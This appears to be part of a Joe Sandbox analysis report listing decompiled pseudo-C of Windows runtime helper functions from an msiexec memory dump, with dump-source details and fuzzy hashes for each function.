                              Uniqueness Score: -1.00%

                              C-Code - Quality: 86%
                              			E04DD4015(signed int __eax, signed int __ecx) {
                              				void* __ebx;
                              				void* __edi;
                              				signed char _t10;
                              				signed int _t28;
                              
                              				_push(__ecx);
                              				_t28 = __ecx;
                              				asm("lock xadd [edi+0x24], eax");
                              				_t10 = (__eax | 0xffffffff) - 1;
                              				if(_t10 == 0) {
                              					_t1 = _t28 + 0x1c; // 0x1e
                              					E04D22280(_t10, _t1);
                              					 *((intOrPtr*)(_t28 + 0x20)) =  *((intOrPtr*)( *[fs:0x18] + 0x24));
                              					E04D22280( *((intOrPtr*)( *[fs:0x18] + 0x24)), 0x4df86ac);
                              					E04D0F900(0x4df86d4, _t28);
                              					E04D1FFB0(0x4df86ac, _t28, 0x4df86ac);
                              					 *((intOrPtr*)(_t28 + 0x20)) = 0;
                              					E04D1FFB0(0, _t28, _t1);
                              					_t18 =  *((intOrPtr*)(_t28 + 0x94));
                              					if( *((intOrPtr*)(_t28 + 0x94)) != 0) {
                              						L04D277F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t18);
                              					}
                              					_t10 = L04D277F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t28);
                              				}
                              				return _t10;
                              			}








                              C-Code - Quality: 61%
                              			E04DC14FB(intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a8) {
                              				signed int _v8;
                              				intOrPtr _v16;
                              				intOrPtr _v20;
                              				intOrPtr _v24;
                              				intOrPtr _v28;
                              				short _v54;
                              				char _v60;
                              				void* __edi;
                              				void* __esi;
                              				signed char* _t21;
                              				intOrPtr _t27;
                              				intOrPtr _t33;
                              				intOrPtr _t34;
                              				signed int _t35;
                              
                              				_t32 = __edx;
                              				_t27 = __ebx;
                              				_v8 =  *0x4dfd360 ^ _t35;
                              				_t33 = __edx;
                              				_t34 = __ecx;
                              				E04D4FA60( &_v60, 0, 0x30);
                              				_v20 = _a4;
                              				_v16 = _a8;
                              				_v28 = _t34;
                              				_v24 = _t33;
                              				_v54 = 0x1034;
                              				if(E04D27D50() == 0) {
                              					_t21 = 0x7ffe0388;
                              				} else {
                              					_t21 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
                              				}
                              				_push( &_v60);
                              				_push(0x10);
                              				_push(0x20402);
                              				_push( *_t21 & 0x000000ff);
                              				return E04D4B640(E04D49AE0(), _t27, _v8 ^ _t35, _t32, _t33, _t34);
                              			}


















                              C-Code - Quality: 61%
                              			E04DC138A(intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a8) {
                              				signed int _v8;
                              				intOrPtr _v16;
                              				intOrPtr _v20;
                              				intOrPtr _v24;
                              				intOrPtr _v28;
                              				short _v54;
                              				char _v60;
                              				void* __edi;
                              				void* __esi;
                              				signed char* _t21;
                              				intOrPtr _t27;
                              				intOrPtr _t33;
                              				intOrPtr _t34;
                              				signed int _t35;
                              
                              				_t32 = __edx;
                              				_t27 = __ebx;
                              				_v8 =  *0x4dfd360 ^ _t35;
                              				_t33 = __edx;
                              				_t34 = __ecx;
                              				E04D4FA60( &_v60, 0, 0x30);
                              				_v20 = _a4;
                              				_v16 = _a8;
                              				_v28 = _t34;
                              				_v24 = _t33;
                              				_v54 = 0x1033;
                              				if(E04D27D50() == 0) {
                              					_t21 = 0x7ffe0388;
                              				} else {
                              					_t21 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
                              				}
                              				_push( &_v60);
                              				_push(0x10);
                              				_push(0x20402);
                              				_push( *_t21 & 0x000000ff);
                              				return E04D4B640(E04D49AE0(), _t27, _v8 ^ _t35, _t32, _t33, _t34);
                              			}


















                              C-Code - Quality: 91%
                              			E04D058EC(intOrPtr __ecx) {
                              				signed int _v8;
                              				char _v28;
                              				char _v44;
                              				char _v76;
                              				void* __edi;
                              				void* __esi;
                              				intOrPtr _t10;
                              				intOrPtr _t16;
                              				intOrPtr _t17;
                              				intOrPtr _t27;
                              				intOrPtr _t28;
                              				signed int _t29;
                              
                              				_v8 =  *0x4dfd360 ^ _t29;
                              				_t10 =  *[fs:0x30];
                              				_t27 = __ecx;
                              				if(_t10 == 0) {
                              					L6:
                              					_t28 = 0x4ce5c80;
                              				} else {
                              					_t16 =  *((intOrPtr*)(_t10 + 0x10));
                              					if(_t16 == 0) {
                              						goto L6;
                              					} else {
                              						_t28 =  *((intOrPtr*)(_t16 + 0x3c));
                              					}
                              				}
                              				if(E04D05943() != 0 &&  *0x4df5320 > 5) {
                              					E04D87B5E( &_v44, _t27);
                              					_t22 =  &_v28;
                              					E04D87B5E( &_v28, _t28);
                              					_t11 = E04D87B9C(0x4df5320, 0x4cebf15,  &_v28, _t22, 4,  &_v76);
                              				}
                              				return E04D4B640(_t11, _t17, _v8 ^ _t29, 0x4cebf15, _t27, _t28);
                              			}
















                              C-Code - Quality: 59%
                              			E04DBFEC0(intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
                              				signed int _v12;
                              				intOrPtr _v24;
                              				intOrPtr _v28;
                              				intOrPtr _v32;
                              				short _v58;
                              				char _v64;
                              				void* __edi;
                              				void* __esi;
                              				signed char* _t18;
                              				intOrPtr _t24;
                              				intOrPtr _t30;
                              				intOrPtr _t31;
                              				signed int _t32;
                              
                              				_t29 = __edx;
                              				_t24 = __ebx;
                              				_v12 =  *0x4dfd360 ^ _t32;
                              				_t30 = __edx;
                              				_t31 = __ecx;
                              				E04D4FA60( &_v64, 0, 0x30);
                              				_v24 = _a4;
                              				_v32 = _t31;
                              				_v28 = _t30;
                              				_v58 = 0x266;
                              				if(E04D27D50() == 0) {
                              					_t18 = 0x7ffe0388;
                              				} else {
                              					_t18 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
                              				}
                              				_push( &_v64);
                              				_push(0x10);
                              				_push(0x20402);
                              				_push( *_t18 & 0x000000ff);
                              				return E04D4B640(E04D49AE0(), _t24, _v12 ^ _t32, _t29, _t30, _t31);
                              			}

















                              Memory Dump Source
                              • Source File: 0000000B.00000002.941198488.0000000004CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04CE0000, based on PE: true
                              • Associated: 0000000B.00000002.941382853.0000000004DFB000.00000040.00000800.00020000.00000000.sdmp
                              • Associated: 0000000B.00000002.941394667.0000000004DFF000.00000040.00000800.00020000.00000000.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_11_2_4ce0000_msiexec.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 0b16548f80787f5797a96ab78bf0792e853cb9f9a297150b9c8d3fa478dd1f45
                              • Instruction ID: 4ce3f59f993db97a1f6bd7e71f304b9e9dfc3243221701763ab48830e5dd05ca
                              • Opcode Fuzzy Hash: 0b16548f80787f5797a96ab78bf0792e853cb9f9a297150b9c8d3fa478dd1f45
                              • Instruction Fuzzy Hash: E6018871F00218ABDB14DBA9D845FAFB7B8EF44704F40406AF901EB390D974EA01C7A4
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 59%
                              			E04DBFE3F(intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
                              				signed int _v12;
                              				intOrPtr _v24;
                              				intOrPtr _v28;
                              				intOrPtr _v32;
                              				short _v58;
                              				char _v64;
                              				void* __edi;
                              				void* __esi;
                              				signed char* _t18;
                              				intOrPtr _t24;
                              				intOrPtr _t30;
                              				intOrPtr _t31;
                              				signed int _t32;
                              
                              				_t29 = __edx;
                              				_t24 = __ebx;
                              				_v12 =  *0x4dfd360 ^ _t32;
                              				_t30 = __edx;
                              				_t31 = __ecx;
                              				E04D4FA60( &_v64, 0, 0x30);
                              				_v24 = _a4;
                              				_v32 = _t31;
                              				_v28 = _t30;
                              				_v58 = 0x267;
                              				if(E04D27D50() == 0) {
                              					_t18 = 0x7ffe0388;
                              				} else {
                              					_t18 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
                              				}
                              				_push( &_v64);
                              				_push(0x10);
                              				_push(0x20402);
                              				_push( *_t18 & 0x000000ff);
                              				return E04D4B640(E04D49AE0(), _t24, _v12 ^ _t32, _t29, _t30, _t31);
                              			}

















                              Memory Dump Source
                              • Source File: 0000000B.00000002.941198488.0000000004CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04CE0000, based on PE: true
                              • Associated: 0000000B.00000002.941382853.0000000004DFB000.00000040.00000800.00020000.00000000.sdmp
                              • Associated: 0000000B.00000002.941394667.0000000004DFF000.00000040.00000800.00020000.00000000.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_11_2_4ce0000_msiexec.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 9047807f6f873bdd365a50d74fb137033d67c4d362abfb87f8066c60b610bae3
                              • Instruction ID: 73f83171f7abaa4a0ecd33ca18a97588cd07aa2fbb1b9fd7e998ff24d4288757
                              • Opcode Fuzzy Hash: 9047807f6f873bdd365a50d74fb137033d67c4d362abfb87f8066c60b610bae3
                              • Instruction Fuzzy Hash: BD018471F00218ABDB14DFA9D846FAEB7B8EF84704F00406AF901EB391DA74E901C7A4
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 100%
                              			E04DD1074(intOrPtr __ebx, signed int* __ecx, char __edx, void* __edi, intOrPtr _a4) {
                              				char _v8;
                              				void* _v11;
                              				unsigned int _v12;
                              				void* _v15;
                              				void* __esi;
                              				void* __ebp;
                              				char* _t16;
                              				signed int* _t35;
                              
                              				_t22 = __ebx;
                              				_t35 = __ecx;
                              				_v8 = __edx;
                              				_t13 =  !( *__ecx) + 1;
                              				_v12 =  !( *__ecx) + 1;
                              				if(_a4 != 0) {
                              					E04DD165E(__ebx, 0x4df8ae4, (__edx -  *0x4df8b04 >> 0x14) + (__edx -  *0x4df8b04 >> 0x14), __edi, __ecx, (__edx -  *0x4df8b04 >> 0x14) + (__edx -  *0x4df8b04 >> 0x14), (_t13 >> 0x14) + (_t13 >> 0x14));
                              				}
                              				E04DCAFDE( &_v8,  &_v12, 0x8000,  *((intOrPtr*)(_t35 + 0x34)),  *((intOrPtr*)(_t35 + 0x38)));
                              				if(E04D27D50() == 0) {
                              					_t16 = 0x7ffe0388;
                              				} else {
                              					_t16 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
                              				}
                              				if( *_t16 != 0) {
                              					_t16 = E04DBFE3F(_t22, _t35, _v8, _v12);
                              				}
                              				return _t16;
                              			}












                              Memory Dump Source
                              • Source File: 0000000B.00000002.941198488.0000000004CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04CE0000, based on PE: true
                              • Associated: 0000000B.00000002.941382853.0000000004DFB000.00000040.00000800.00020000.00000000.sdmp
                              • Associated: 0000000B.00000002.941394667.0000000004DFF000.00000040.00000800.00020000.00000000.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_11_2_4ce0000_msiexec.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 8ba974baf75511c106cd6ced8db7bea6abdd597762f246f6e82c719d5a7df677
                              • Instruction ID: 6364620134d9e05a9d43894e73967deffff5c3bb5ac14c8286a9f51f22dabdf8
                              • Opcode Fuzzy Hash: 8ba974baf75511c106cd6ced8db7bea6abdd597762f246f6e82c719d5a7df677
                              • Instruction Fuzzy Hash: 0701F1727047429BD721EB68C900B2A77E5FB84318F048629F88683290EE30F840CBA2
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 100%
                              			E04D1B02A(intOrPtr __ecx, signed short* __edx, short _a4) {
                              				signed char _t11;
                              				signed char* _t12;
                              				intOrPtr _t24;
                              				signed short* _t25;
                              
                              				_t25 = __edx;
                              				_t24 = __ecx;
                              				_t11 = ( *[fs:0x30])[0x50];
                              				if(_t11 != 0) {
                              					if( *_t11 == 0) {
                              						goto L1;
                              					}
                              					_t12 = ( *[fs:0x30])[0x50] + 0x22a;
                              					L2:
                              					if( *_t12 != 0) {
                              						_t12 =  *[fs:0x30];
                              						if((_t12[0x240] & 0x00000004) == 0) {
                              							goto L3;
                              						}
                              						if(E04D27D50() == 0) {
                              							_t12 = 0x7ffe0385;
                              						} else {
                              							_t12 = ( *[fs:0x30])[0x50] + 0x22b;
                              						}
                              						if(( *_t12 & 0x00000020) == 0) {
                              							goto L3;
                              						}
                              						return E04D87016(_a4, _t24, 0, 0, _t25, 0);
                              					}
                              					L3:
                              					return _t12;
                              				}
                              				L1:
                              				_t12 = 0x7ffe0384;
                              				goto L2;
                              			}








                              Memory Dump Source
                              • Source File: 0000000B.00000002.941198488.0000000004CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04CE0000, based on PE: true
                              • Associated: 0000000B.00000002.941382853.0000000004DFB000.00000040.00000800.00020000.00000000.sdmp
                              • Associated: 0000000B.00000002.941394667.0000000004DFF000.00000040.00000800.00020000.00000000.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_11_2_4ce0000_msiexec.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 2e61b3b4b4670f516fc01dc09380e60ecf2e8637ce05565c6f774399af743f4d
                              • Instruction ID: af8105e308199fb1e983a7edec3ea668a774f8de8b755e2922bbe9dc7f98ca52
                              • Opcode Fuzzy Hash: 2e61b3b4b4670f516fc01dc09380e60ecf2e8637ce05565c6f774399af743f4d
                              • Instruction Fuzzy Hash: 20018F32300980EFD322CB5CD988F7677E8FB46754F0900A2F95ACBA61E668FC40C620
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 54%
                              			E04DD8ED6(intOrPtr __ecx, intOrPtr __edx) {
                              				signed int _v8;
                              				signed int _v12;
                              				intOrPtr _v16;
                              				intOrPtr _v20;
                              				intOrPtr _v24;
                              				intOrPtr _v28;
                              				intOrPtr _v32;
                              				intOrPtr _v36;
                              				short _v62;
                              				char _v68;
                              				signed char* _t29;
                              				intOrPtr _t35;
                              				intOrPtr _t41;
                              				intOrPtr _t42;
                              				signed int _t43;
                              
                              				_t40 = __edx;
                              				_v8 =  *0x4dfd360 ^ _t43;
                              				_v28 = __ecx;
                              				_v62 = 0x1c2a;
                              				_v36 =  *((intOrPtr*)(__edx + 0xc8));
                              				_v32 =  *((intOrPtr*)(__edx + 0xcc));
                              				_v20 =  *((intOrPtr*)(__edx + 0xd8));
                              				_v16 =  *((intOrPtr*)(__edx + 0xd4));
                              				_v24 = __edx;
                              				_v12 = ( *(__edx + 0xde) & 0x000000ff) >> 0x00000001 & 0x00000001;
                              				if(E04D27D50() == 0) {
                              					_t29 = 0x7ffe0386;
                              				} else {
                              					_t29 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
                              				}
                              				_push( &_v68);
                              				_push(0x1c);
                              				_push(0x20402);
                              				_push( *_t29 & 0x000000ff);
                              				return E04D4B640(E04D49AE0(), _t35, _v8 ^ _t43, _t40, _t41, _t42);
                              			}



















                              Memory Dump Source
                              • Source File: 0000000B.00000002.941198488.0000000004CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04CE0000, based on PE: true
                              • Associated: 0000000B.00000002.941382853.0000000004DFB000.00000040.00000800.00020000.00000000.sdmp
                              • Associated: 0000000B.00000002.941394667.0000000004DFF000.00000040.00000800.00020000.00000000.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_11_2_4ce0000_msiexec.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 6f4b633eb7e8d2a9fd074bf72bfe490db9fd23e45b0b1f35b0b1673a1fbbbf97
                              • Instruction ID: 1738a0b71951048d9361b3299b589367528195e319b646a89166d829126dd7da
                              • Opcode Fuzzy Hash: 6f4b633eb7e8d2a9fd074bf72bfe490db9fd23e45b0b1f35b0b1673a1fbbbf97
                              • Instruction Fuzzy Hash: 04111E70E002199FDB04DFA9D541BAEB7F4FF08304F0442AAE519EB782E634E940DB90
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 54%
                              			E04DD8A62(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
                              				signed int _v12;
                              				intOrPtr _v24;
                              				intOrPtr _v28;
                              				intOrPtr _v32;
                              				intOrPtr _v36;
                              				intOrPtr _v40;
                              				short _v66;
                              				char _v72;
                              				void* __ebx;
                              				void* __edi;
                              				void* __esi;
                              				signed char* _t18;
                              				signed int _t32;
                              
                              				_t29 = __edx;
                              				_v12 =  *0x4dfd360 ^ _t32;
                              				_t31 = _a8;
                              				_t30 = _a12;
                              				_v66 = 0x1c20;
                              				_v40 = __ecx;
                              				_v36 = __edx;
                              				_v32 = _a4;
                              				_v28 = _a8;
                              				_v24 = _a12;
                              				if(E04D27D50() == 0) {
                              					_t18 = 0x7ffe0386;
                              				} else {
                              					_t18 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
                              				}
                              				_push( &_v72);
                              				_push(0x14);
                              				_push(0x20402);
                              				_push( *_t18 & 0x000000ff);
                              				return E04D4B640(E04D49AE0(), 0x1c20, _v12 ^ _t32, _t29, _t30, _t31);
                              			}

















                              Memory Dump Source
                              • Source File: 0000000B.00000002.941198488.0000000004CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04CE0000, based on PE: true
                              • Associated: 0000000B.00000002.941382853.0000000004DFB000.00000040.00000800.00020000.00000000.sdmp
                              • Associated: 0000000B.00000002.941394667.0000000004DFF000.00000040.00000800.00020000.00000000.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_11_2_4ce0000_msiexec.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 91cb0e2d44934aa99fbc4cee4f2d35eb91bf40d2cdd1b408ba3ec7e62d8b1321
                              • Instruction ID: 1a104a08f9fbc1141956685309a739a6dbfa1a17e79d1d4c753faae47ec068e0
                              • Opcode Fuzzy Hash: 91cb0e2d44934aa99fbc4cee4f2d35eb91bf40d2cdd1b408ba3ec7e62d8b1321
                              • Instruction Fuzzy Hash: CA012CB1A0021CAFDB00DFA9D941AAEB7B8FF48314F10405AF905F7341E634B900CBA4
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 100%
                              			E04D0DB60(signed int __ecx) {
                              				intOrPtr* _t9;
                              				void* _t12;
                              				void* _t13;
                              				intOrPtr _t14;
                              
                              				_t9 = __ecx;
                              				_t14 = 0;
                              				if(__ecx == 0 ||  *((intOrPtr*)(__ecx)) != 0) {
                              					_t13 = 0xc000000d;
                              				} else {
                              					_t14 = E04D0DB40();
                              					if(_t14 == 0) {
                              						_t13 = 0xc0000017;
                              					} else {
                              						_t13 = E04D0E7B0(__ecx, _t12, _t14, 0xfff);
                              						if(_t13 < 0) {
                              							L04D0E8B0(__ecx, _t14, 0xfff);
                              							L04D277F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t14);
                              							_t14 = 0;
                              						} else {
                              							_t13 = 0;
                              							 *((intOrPtr*)(_t14 + 0xc)) =  *0x7ffe03a4;
                              						}
                              					}
                              				}
                              				 *_t9 = _t14;
                              				return _t13;
                              			}








                              Memory Dump Source
                              • Source File: 0000000B.00000002.941198488.0000000004CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04CE0000, based on PE: true
                              • Associated: 0000000B.00000002.941382853.0000000004DFB000.00000040.00000800.00020000.00000000.sdmp
                              • Associated: 0000000B.00000002.941394667.0000000004DFF000.00000040.00000800.00020000.00000000.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_11_2_4ce0000_msiexec.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 4108fb18439822e7528065d03744c5b66e5752e741267b0d2dbc6e7ad13d6de1
                              • Instruction ID: 1e7f73fede562819d6f7235abb138a848167f866aa7879a304032e11986d86bc
                              • Opcode Fuzzy Hash: 4108fb18439822e7528065d03744c5b66e5752e741267b0d2dbc6e7ad13d6de1
                              • Instruction Fuzzy Hash: 61F068333415229BE7726AD98880B57A6A6DFD1A64F154437F1059B2C4C970EC0296E5
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 100%
                              			E04D0B1E1(intOrPtr __ecx, char __edx, char _a4, signed short* _a8) {
                              				signed char* _t13;
                              				intOrPtr _t22;
                              				char _t23;
                              
                              				_t23 = __edx;
                              				_t22 = __ecx;
                              				if(E04D27D50() != 0) {
                              					_t13 = ( *[fs:0x30])[0x50] + 0x22a;
                              				} else {
                              					_t13 = 0x7ffe0384;
                              				}
                              				if( *_t13 != 0) {
                              					_t13 =  *[fs:0x30];
                              					if((_t13[0x240] & 0x00000004) == 0) {
                              						goto L3;
                              					}
                              					if(E04D27D50() == 0) {
                              						_t13 = 0x7ffe0385;
                              					} else {
                              						_t13 = ( *[fs:0x30])[0x50] + 0x22b;
                              					}
                              					if(( *_t13 & 0x00000020) == 0) {
                              						goto L3;
                              					}
                              					return E04D87016(0x14a4, _t22, _t23, _a4, _a8, 0);
                              				} else {
                              					L3:
                              					return _t13;
                              				}
                              			}







                              Memory Dump Source
                              • Source File: 0000000B.00000002.941198488.0000000004CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04CE0000, based on PE: true
                              • Associated: 0000000B.00000002.941382853.0000000004DFB000.00000040.00000800.00020000.00000000.sdmp
                              • Associated: 0000000B.00000002.941394667.0000000004DFF000.00000040.00000800.00020000.00000000.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_11_2_4ce0000_msiexec.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: d7c926d8f7ad5fed70f9c3145ab0d11368f8906714783f3796a50782a1b3489b
                              • Instruction ID: d5011c76fe037fa4fff02697e5f582e8bdedfa8e376cea3b00df49ea85f6dea6
                              • Opcode Fuzzy Hash: d7c926d8f7ad5fed70f9c3145ab0d11368f8906714783f3796a50782a1b3489b
                              • Instruction Fuzzy Hash: 06018132344680EBD32297A9C904F6A7B99FF51758F0940A2F9558B6B2E679F800D229
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 46%
                              			E04D9FE87(intOrPtr __ecx) {
                              				signed int _v8;
                              				intOrPtr _v16;
                              				intOrPtr _v20;
                              				signed int _v24;
                              				intOrPtr _v28;
                              				short _v54;
                              				char _v60;
                              				signed char* _t21;
                              				intOrPtr _t27;
                              				intOrPtr _t32;
                              				intOrPtr _t33;
                              				intOrPtr _t34;
                              				signed int _t35;
                              
                              				_v8 =  *0x4dfd360 ^ _t35;
                              				_v16 = __ecx;
                              				_v54 = 0x1722;
                              				_v24 =  *(__ecx + 0x14) & 0x00ffffff;
                              				_v28 =  *((intOrPtr*)(__ecx + 4));
                              				_v20 =  *((intOrPtr*)(__ecx + 0xc));
                              				if(E04D27D50() == 0) {
                              					_t21 = 0x7ffe0382;
                              				} else {
                              					_t21 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x228;
                              				}
                              				_push( &_v60);
                              				_push(0x10);
                              				_push(0x20402);
                              				_push( *_t21 & 0x000000ff);
                              				return E04D4B640(E04D49AE0(), _t27, _v8 ^ _t35, _t32, _t33, _t34);
                              			}

















                              Memory Dump Source
                              • Source File: 0000000B.00000002.941198488.0000000004CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04CE0000, based on PE: true
                              • Associated: 0000000B.00000002.941382853.0000000004DFB000.00000040.00000800.00020000.00000000.sdmp
                              • Associated: 0000000B.00000002.941394667.0000000004DFF000.00000040.00000800.00020000.00000000.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_11_2_4ce0000_msiexec.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 3b3d57549a62481779ced451b1b2b90cab9be3344c4032c3315ac22659914018
                              • Instruction ID: 419e9b3bfc2724417d41db92481fe4e4054199fb68221db7f555fa79878f1a69
                              • Opcode Fuzzy Hash: 3b3d57549a62481779ced451b1b2b90cab9be3344c4032c3315ac22659914018
                              • Instruction Fuzzy Hash: 6B011270A00209EFDB14DFA8D556A6EB7F4FF04304F544199A555EB382D635ED01CB54
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 48%
                              			E04DD8F6A(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a8) {
                              				signed int _v8;
                              				intOrPtr _v12;
                              				intOrPtr _v16;
                              				intOrPtr _v20;
                              				intOrPtr _v24;
                              				short _v50;
                              				char _v56;
                              				signed char* _t18;
                              				intOrPtr _t24;
                              				intOrPtr _t30;
                              				intOrPtr _t31;
                              				signed int _t32;
                              
                              				_t29 = __edx;
                              				_v8 =  *0x4dfd360 ^ _t32;
                              				_v16 = __ecx;
                              				_v50 = 0x1c2c;
                              				_v24 = _a4;
                              				_v20 = _a8;
                              				_v12 = __edx;
                              				if(E04D27D50() == 0) {
                              					_t18 = 0x7ffe0386;
                              				} else {
                              					_t18 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
                              				}
                              				_push( &_v56);
                              				_push(0x10);
                              				_push(0x402);
                              				_push( *_t18 & 0x000000ff);
                              				return E04D4B640(E04D49AE0(), _t24, _v8 ^ _t32, _t29, _t30, _t31);
                              			}
















                              Memory Dump Source
                              • Source File: 0000000B.00000002.941198488.0000000004CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04CE0000, based on PE: true
                              • Associated: 0000000B.00000002.941382853.0000000004DFB000.00000040.00000800.00020000.00000000.sdmp
                              • Associated: 0000000B.00000002.941394667.0000000004DFF000.00000040.00000800.00020000.00000000.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_11_2_4ce0000_msiexec.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: c8c013f30342360fe3dd7baec8d336fba23805812b2463af710745651d83c7ff
                              • Instruction ID: cb6c9db927a4b19bcb00a87aa22c38caaeab53ad493865ba8def14e1023e53d5
                              • Opcode Fuzzy Hash: c8c013f30342360fe3dd7baec8d336fba23805812b2463af710745651d83c7ff
                              • Instruction Fuzzy Hash: 4E013C74A00208AFDB04EFB8D545AAEB7F4EF58304F50405AB915EB381EA74FA00DB94
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 48%
                              			E04DC131B(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a8) {
                              				signed int _v8;
                              				intOrPtr _v12;
                              				intOrPtr _v16;
                              				intOrPtr _v20;
                              				intOrPtr _v24;
                              				short _v50;
                              				char _v56;
                              				signed char* _t18;
                              				intOrPtr _t24;
                              				intOrPtr _t30;
                              				intOrPtr _t31;
                              				signed int _t32;
                              
                              				_t29 = __edx;
                              				_v8 =  *0x4dfd360 ^ _t32;
                              				_v20 = _a4;
                              				_v12 = _a8;
                              				_v24 = __ecx;
                              				_v16 = __edx;
                              				_v50 = 0x1021;
                              				if(E04D27D50() == 0) {
                              					_t18 = 0x7ffe0380;
                              				} else {
                              					_t18 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
                              				}
                              				_push( &_v56);
                              				_push(0x10);
                              				_push(0x20402);
                              				_push( *_t18 & 0x000000ff);
                              				return E04D4B640(E04D49AE0(), _t24, _v8 ^ _t32, _t29, _t30, _t31);
                              			}
















                              Memory Dump Source
                              • Source File: 0000000B.00000002.941198488.0000000004CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04CE0000, based on PE: true
                              • Associated: 0000000B.00000002.941382853.0000000004DFB000.00000040.00000800.00020000.00000000.sdmp
                              • Associated: 0000000B.00000002.941394667.0000000004DFF000.00000040.00000800.00020000.00000000.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_11_2_4ce0000_msiexec.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 78e6256a72f9d2ceb9812498c61137c0ba2bbf62854e7cea1dc444b5edd16d4d
                              • Instruction ID: abd45bc86c38e3c5e6ad4251f796f0369284fb806383ac08155abb3b4530ecb1
                              • Opcode Fuzzy Hash: 78e6256a72f9d2ceb9812498c61137c0ba2bbf62854e7cea1dc444b5edd16d4d
                              • Instruction Fuzzy Hash: 44013C71A01218AFDB04EFA9D545AAEB7F4FF48704F40405AF945EB381E674EA00CB94
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 46%
                              			E04DC1608(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
                              				signed int _v8;
                              				intOrPtr _v12;
                              				intOrPtr _v16;
                              				intOrPtr _v20;
                              				short _v46;
                              				char _v52;
                              				signed char* _t15;
                              				intOrPtr _t21;
                              				intOrPtr _t27;
                              				intOrPtr _t28;
                              				signed int _t29;
                              
                              				_t26 = __edx;
                              				_v8 =  *0x4dfd360 ^ _t29;
                              				_v12 = _a4;
                              				_v20 = __ecx;
                              				_v16 = __edx;
                              				_v46 = 0x1024;
                              				if(E04D27D50() == 0) {
                              					_t15 = 0x7ffe0380;
                              				} else {
                              					_t15 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
                              				}
                              				_push( &_v52);
                              				_push(0xc);
                              				_push(0x20402);
                              				_push( *_t15 & 0x000000ff);
                              				return E04D4B640(E04D49AE0(), _t21, _v8 ^ _t29, _t26, _t27, _t28);
                              			}















                              Memory Dump Source
